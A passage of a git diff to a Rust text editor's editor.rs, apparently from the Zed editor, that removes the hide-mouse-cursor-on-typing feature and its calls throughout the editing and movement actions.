"on_typing_and_action", // Determines whether the focused panel follows the mouse location. "focus_follows_mouse": { "enabled": false, diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index a05876d2d9cdbc..ea38200cfe7686 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -65,8 +65,8 @@ pub use display_map::{ pub use edit_prediction_types::Direction; pub use editor_settings::{ CompletionDetailAlignment, CurrentLineHighlight, DiffViewStyle, DocumentColorsRenderMode, - EditorSettings, EditorSettingsScrollbarProxy, HideMouseMode, ScrollBeyondLastLine, - ScrollbarAxes, SearchSettings, ShowMinimap, ui_scrollbar_settings_from_raw, + EditorSettings, EditorSettingsScrollbarProxy, ScrollBeyondLastLine, ScrollbarAxes, + SearchSettings, ShowMinimap, ui_scrollbar_settings_from_raw, }; pub use element::{ CursorLayout, EditorElement, HighlightedRange, HighlightedRangeLine, PointForPosition, @@ -334,11 +334,6 @@ enum DisplayDiffHunk { }, } -pub enum HideMouseCursorOrigin { - TypingAction, - MovementAction, -} - pub fn init(cx: &mut App) { cx.set_global(GlobalBlameRenderer(Arc::new(()))); cx.set_global(breadcrumbs::RenderBreadcrumbText(render_breadcrumb_text)); @@ -1354,9 +1349,7 @@ pub struct Editor { _scroll_cursor_center_top_bottom_task: Task<()>, serialize_selections: Task<()>, serialize_folds: Task<()>, - mouse_cursor_hidden: bool, minimap: Option>, - hide_mouse_mode: HideMouseMode, pub change_list: ChangeList, inline_value_cache: InlineValueCache, number_deleted_lines: bool, @@ -2624,9 +2617,6 @@ impl Editor { blink_manager.disable(cx); } }); - if active { - editor.show_mouse_cursor(cx); - } }), ] }) @@ -2658,11 +2648,7 @@ impl Editor { text_style_refinement: None, load_diff_task: load_uncommitted_diff, temporary_diff_override: false, - mouse_cursor_hidden: false, minimap: None, - hide_mouse_mode: EditorSettings::get_global(cx) - .hide_mouse - .unwrap_or_default(), change_list: ChangeList::new(), mode, selection_drag_state: SelectionDragState::None, @@ -3004,31 +2990,6 @@ impl Editor { self.last_bounds.as_ref() } - fn show_mouse_cursor(&mut self, cx: &mut Context) { - if self.mouse_cursor_hidden { - self.mouse_cursor_hidden = false; - cx.notify(); - } - } - - pub fn hide_mouse_cursor(&mut self, origin: HideMouseCursorOrigin, cx: &mut Context) { - let hide_mouse_cursor = match origin { - HideMouseCursorOrigin::TypingAction => { - matches!( - self.hide_mouse_mode, - HideMouseMode::OnTyping | HideMouseMode::OnTypingAndMovement - ) - } - HideMouseCursorOrigin::MovementAction => { - matches!(self.hide_mouse_mode, HideMouseMode::OnTypingAndMovement) - } - }; - if self.mouse_cursor_hidden != hide_mouse_cursor { - self.mouse_cursor_hidden = hide_mouse_cursor; - cx.notify(); - } - } - fn accept_edit_prediction_keystroke( &self, granularity: EditPredictionGranularity, @@ -4830,8 +4791,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); - self.unfold_buffers_with_selections(cx); let selections = self.selections.all_adjusted(&self.display_snapshot(cx)); @@ -5333,7 +5292,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { let (edits_with_flags, selection_info): (Vec<_>, Vec<_>) = { let selections = this @@ -5572,8 +5530,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); - let buffer = self.buffer.read(cx); let snapshot = buffer.snapshot(cx); @@ -5643,8 +5599,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); - let mut buffer_edits: HashMap, Vec)> = HashMap::default(); let mut rows = Vec::new(); let mut rows_inserted = 0; @@ -6699,7 +6653,6 @@ impl Editor { if self.read_only(cx) { return None; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.do_completion(action.item_ix, CompletionIntent::Complete, window, cx) } @@ -6712,7 +6665,6 @@ impl Editor { if self.read_only(cx) { return None; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.do_completion(None, CompletionIntent::CompleteWithInsert, window, cx) } @@ -6725,7 +6677,6 @@ impl Editor { if self.read_only(cx) { return None; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.do_completion(None, CompletionIntent::CompleteWithReplace, window, cx) } @@ -6735,7 +6686,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) -> Option>> { - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.do_completion(action.item_ix, CompletionIntent::Compose, window, cx) } @@ -7229,7 +7179,6 @@ impl Editor { if self.read_only(cx) { return None; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let actions_menu = if let CodeContextMenu::CodeActions(menu) = self.hide_context_menu(window, cx)? { @@ -11293,7 +11242,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.select_autoclose_pair(window, cx); @@ -11346,7 +11294,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.change_selections(Default::default(), window, cx, |s| { s.move_with(&mut |map, selection| { @@ -11372,7 +11319,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); if self.move_to_prev_snippet_tabstop(window, cx) { return; } @@ -11391,7 +11337,6 @@ impl Editor { } if self.move_to_next_snippet_tabstop(window, cx) { - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); return; } cx.propagate(); @@ -11409,7 +11354,6 @@ impl Editor { } if self.move_to_prev_snippet_tabstop(window, cx) { - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); return; } cx.propagate(); @@ -11422,13 +11366,11 @@ impl Editor { } if self.move_to_next_snippet_tabstop(window, cx) { - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); return; } if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let mut selections = self.selections.all_adjusted(&self.display_snapshot(cx)); let buffer = self.buffer.read(cx); let snapshot = buffer.snapshot(cx); @@ -11560,7 +11502,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let mut selections = self.selections.all::(&self.display_snapshot(cx)); let mut prev_edited_row = 0; let mut row_delta = 0; @@ -11668,7 +11609,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); let selections = self.selections.all::(&display_map); let mut deletion_ranges = Vec::new(); @@ -11747,7 +11687,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let selections = self .selections .all::(&self.display_snapshot(cx)) @@ -11769,7 +11708,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); let selections = self.selections.all::(&display_map); @@ -11983,7 +11921,6 @@ impl Editor { } pub fn join_lines(&mut self, _: &JoinLines, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.join_lines_impl(true, window, cx); } @@ -12065,7 +12002,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let snapshot = self.buffer.read(cx).snapshot(cx); @@ -12168,7 +12104,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let mut buffer_ids = HashSet::default(); let snapshot = self.buffer().read(cx).snapshot(cx); for selection in self @@ -12190,7 +12125,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let selections = self .selections .all(&self.display_snapshot(cx)) @@ -12219,7 +12153,6 @@ impl Editor { .map(|selection| selection.range()) .collect(); - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.restore_hunks_in_ranges(selections, window, cx); let all_diff_hunks_expanded = self.buffer().read(cx).all_diff_hunks_expanded(); @@ -12622,7 +12555,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let display_snapshot = self.display_snapshot(cx); @@ -12863,7 +12795,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let display_snapshot = self.display_snapshot(cx); let selections = self.selections.all::(&display_snapshot); @@ -13017,7 +12948,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); let buffer = self.buffer.read(cx).snapshot(cx); @@ -13439,7 +13369,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let buffer = self.buffer.read(cx).snapshot(cx); let mut new_selections = Vec::new(); @@ -13539,7 +13468,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); let buffer = display_map.buffer_snapshot(); @@ -13687,7 +13615,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); if self.mode.is_single_line() { cx.propagate(); return; @@ -13801,7 +13728,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); if self.mode.is_single_line() { cx.propagate(); return; @@ -13898,7 +13824,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let text_layout_details = &self.text_layout_details(window, cx); self.transact(window, cx, |this, window, cx| { let edits = this.change_selections(Default::default(), window, cx, |s| { @@ -13963,7 +13888,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); if self.mode.is_single_line() { cx.propagate(); return; @@ -14426,7 +14350,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let item = self.cut_common(true, window, cx); cx.write_to_clipboard(item); } @@ -14435,7 +14358,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.change_selections(SelectionEffects::no_scroll(), window, cx, |s| { s.move_with(&mut |snapshot, sel| { if sel.is_empty() { @@ -14456,7 +14378,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let (text, metadata) = if let Some(KillRing(item)) = cx.try_global() { if let Some(ClipboardEntry::String(kill_ring)) = item.entries().first() { (kill_ring.text().to_string(), kill_ring.metadata_json()) @@ -14804,7 +14725,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); if let Some(item) = cx.read_from_clipboard() { let clipboard_string = item.entries().iter().find_map(|entry| match entry { ClipboardEntry::String(s) => Some(s), @@ -14828,8 +14748,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); - if let Some(transaction_id) = self.buffer.update(cx, |buffer, cx| buffer.undo(cx)) { if let Some((selections, _)) = self.selection_history.transaction(transaction_id).cloned() @@ -14858,8 +14776,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); - if let Some(transaction_id) = self.buffer.update(cx, |buffer, cx| buffer.redo(cx)) { if let Some((_, Some(selections))) = self.selection_history.transaction(transaction_id).cloned() @@ -14893,7 +14809,6 @@ impl Editor { } pub fn move_left(&mut self, _: &MoveLeft, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_with(&mut |map, selection| { let cursor = if selection.is_empty() { @@ -14907,14 +14822,12 @@ impl Editor { } pub fn select_left(&mut self, _: &SelectLeft, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, _| (movement::left(map, head), SelectionGoal::None)); }) } pub fn move_right(&mut self, _: &MoveRight, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_with(&mut |map, selection| { let cursor = if selection.is_empty() { @@ -14928,7 +14841,6 @@ impl Editor { } pub fn select_right(&mut self, _: &SelectRight, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, _| { (movement::right(map, head), SelectionGoal::None) @@ -14946,8 +14858,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let text_layout_details = &self.text_layout_details(window, cx); let selection_count = self.selections.count(); let first_selection = self.selections.first_anchor(); @@ -14989,8 +14899,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let text_layout_details = &self.text_layout_details(window, cx); self.change_selections(Default::default(), window, cx, |s| { @@ -15026,8 +14934,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let text_layout_details = &self.text_layout_details(window, cx); self.change_selections(Default::default(), window, cx, |s| { @@ -15054,7 +14960,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let text_layout_details = &self.text_layout_details(window, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, goal| { @@ -15069,7 +14974,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let text_layout_details = &self.text_layout_details(window, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, goal| { @@ -15088,8 +14992,6 @@ impl Editor { return; }; - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let text_layout_details = &self.text_layout_details(window, cx); self.change_selections(Default::default(), window, cx, |s| { @@ -15128,8 +15030,6 @@ impl Editor { return; }; - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let effects = if action.center_cursor { SelectionEffects::scroll(Autoscroll::center()) } else { @@ -15157,7 +15057,6 @@ impl Editor { } pub fn select_up(&mut self, _: &SelectUp, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let text_layout_details = &self.text_layout_details(window, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, goal| { @@ -15174,8 +15073,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let text_layout_details = &self.text_layout_details(window, cx); let selection_count = self.selections.count(); let first_selection = self.selections.first_anchor(); @@ -15212,8 +15109,6 @@ impl Editor { return; }; - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let text_layout_details = &self.text_layout_details(window, cx); self.change_selections(Default::default(), window, cx, |s| { @@ -15252,8 +15147,6 @@ impl Editor { return; }; - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let effects = if action.center_cursor { SelectionEffects::scroll(Autoscroll::center()) } else { @@ -15280,7 +15173,6 @@ impl Editor { } pub fn select_down(&mut self, _: &SelectDown, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let text_layout_details = &self.text_layout_details(window, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, goal| { @@ -15371,7 +15263,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_cursors_with(&mut |map, head, _| { ( @@ -15388,7 +15279,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_cursors_with(&mut |map, head, _| { ( @@ -15405,7 +15295,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, _| { ( @@ -15422,7 +15311,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, _| { ( @@ -15442,7 +15330,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.select_autoclose_pair(window, cx); this.change_selections(Default::default(), window, cx, |s| { @@ -15476,7 +15363,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.select_autoclose_pair(window, cx); this.change_selections(Default::default(), window, cx, |s| { @@ -15507,7 +15393,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_cursors_with(&mut |map, head, _| { (movement::next_word_end(map, head), SelectionGoal::None) @@ -15521,7 +15406,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_cursors_with(&mut |map, head, _| { (movement::next_subword_end(map, head), SelectionGoal::None) @@ -15535,7 +15419,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, _| { (movement::next_word_end(map, head), SelectionGoal::None) @@ -15549,7 +15432,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, _| { (movement::next_subword_end(map, head), SelectionGoal::None) @@ -15566,7 +15448,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.change_selections(Default::default(), window, cx, |s| { s.move_with(&mut |map, selection| { @@ -15599,7 +15480,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.change_selections(Default::default(), window, cx, |s| { s.move_with(&mut |map, selection| { @@ -15630,7 +15510,6 @@ impl Editor { cx: &mut Context, ) { let stop_at_indent = action.stop_at_indent && !self.mode.is_single_line(); - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_cursors_with(&mut |map, head, _| { ( @@ -15653,7 +15532,6 @@ impl Editor { cx: &mut Context, ) { let stop_at_indent = action.stop_at_indent && !self.mode.is_single_line(); - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, _| { ( @@ -15678,7 +15556,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.change_selections(Default::default(), window, cx, |s| { s.move_with(&mut |_, selection| { @@ -15704,7 +15581,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_cursors_with(&mut |map, head, _| { ( @@ -15721,7 +15597,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, _| { ( @@ -15741,7 +15616,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.select_to_end_of_line( &SelectToEndOfLine { @@ -15763,7 +15637,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.select_to_end_of_line( &SelectToEndOfLine { @@ -15781,7 +15654,6 @@ impl Editor { }); }); } - this.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let item = this.cut_common(false, window, cx); cx.write_to_clipboard(item); }); @@ -15797,7 +15669,6 @@ impl Editor { cx.propagate(); return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_with(&mut |map, selection| { selection.collapse_to( @@ -15818,7 +15689,6 @@ impl Editor { cx.propagate(); return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_with(&mut |map, selection| { selection.collapse_to( @@ -15839,7 +15709,6 @@ impl Editor { cx.propagate(); return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, _| { ( @@ -15860,7 +15729,6 @@ impl Editor { cx.propagate(); return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, _| { ( @@ -15881,7 +15749,6 @@ impl Editor { cx.propagate(); return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_with(&mut |map, selection| { selection.collapse_to( @@ -15931,7 +15798,6 @@ impl Editor { cx.propagate(); return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_with(&mut |map, selection| { selection.collapse_to( @@ -15956,7 +15822,6 @@ impl Editor { cx.propagate(); return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_with(&mut |map, selection| { selection.collapse_to( @@ -15981,7 +15846,6 @@ impl Editor { cx.propagate(); return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, _| { ( @@ -16002,7 +15866,6 @@ impl Editor { cx.propagate(); return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, _| { ( @@ -16023,7 +15886,6 @@ impl Editor { cx.propagate(); return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, _| { ( @@ -16044,7 +15906,6 @@ impl Editor { cx.propagate(); return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, _| { ( @@ -16065,7 +15926,6 @@ impl Editor { cx.propagate(); return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.select_ranges(vec![Anchor::Min..Anchor::Min]); }); @@ -16079,7 +15939,6 @@ impl Editor { ) { let mut selection = self.selections.last::(&self.display_snapshot(cx)); selection.set_head(Point::zero(), SelectionGoal::None); - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.select(vec![selection]); }); @@ -16090,7 +15949,6 @@ impl Editor { cx.propagate(); return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let cursor = self.buffer.read(cx).read(cx).len(); self.change_selections(Default::default(), window, cx, |s| { s.select_ranges(vec![cursor..cursor]) @@ -16179,7 +16037,6 @@ impl Editor { } pub fn select_to_end(&mut self, _: &SelectToEnd, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let buffer = self.buffer.read(cx).snapshot(cx); let mut selection = self .selections @@ -16191,14 +16048,12 @@ impl Editor { } pub fn select_all(&mut self, _: &SelectAll, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(SelectionEffects::no_scroll(), window, cx, |s| { s.select_ranges(vec![Anchor::Min..Anchor::Max]); }); } pub fn select_line(&mut self, _: &SelectLine, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); let mut selections = self.selections.all::(&display_map); let max_point = display_map.buffer_snapshot().max_point(); @@ -16297,8 +16152,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); let all_selections = self.selections.all::(&display_map); let text_layout_details = self.text_layout_details(window, cx); @@ -16720,8 +16573,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) -> Result<()> { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); self.select_next_match_internal(&display_map, false, None, window, cx)?; @@ -16787,7 +16638,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) -> Result<()> { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); self.select_next_match_internal( &display_map, @@ -16804,7 +16654,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) -> Result<()> { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); let buffer = display_map.buffer_snapshot(); let mut selections = self.selections.all::(&display_map); @@ -17011,7 +16860,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, _window, cx| { let mut selections = this .selections @@ -17202,7 +17050,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let text_layout_details = &self.text_layout_details(window, cx); self.transact(window, cx, |this, window, cx| { let mut selections = this @@ -17505,8 +17352,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let buffer = self.buffer.read(cx).snapshot(cx); let old_selections = self .selections @@ -17574,8 +17419,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); let buffer = self.buffer.read(cx).snapshot(cx); @@ -17691,8 +17534,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - if let Some((mut selections, scroll_behavior, is_selection_reversed)) = self.select_syntax_node_history.pop() { @@ -17735,7 +17576,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let buffer = self.buffer.read(cx).snapshot(cx); let selections = self @@ -17817,8 +17657,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let buffer = self.buffer.read(cx).snapshot(cx); let mut selected_sibling = false; @@ -17877,8 +17715,6 @@ impl Editor { ) { let old_selections: Arc<[_]> = self.selections.all_anchors(&self.display_snapshot(cx)); - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let multibuffer_snapshot = self.buffer.read(cx).snapshot(cx); let mut selected_sibling = false; @@ -18017,8 +17853,6 @@ impl Editor { return false; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); let buffer = self.buffer.read(cx).snapshot(cx); @@ -18082,8 +17916,6 @@ impl Editor { cx: &mut Context, move_to_end: bool, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); let buffer = self.buffer.read(cx).snapshot(cx); let old_selections = self.selections.all::(&display_map); @@ -18115,7 +17947,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_offsets_with(&mut |snapshot, selection| { let Some(enclosing_bracket_ranges) = @@ -18172,7 +18003,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); if let Some(entry) = self.selection_history.undo_stack.pop_back() { self.selection_history.mode = 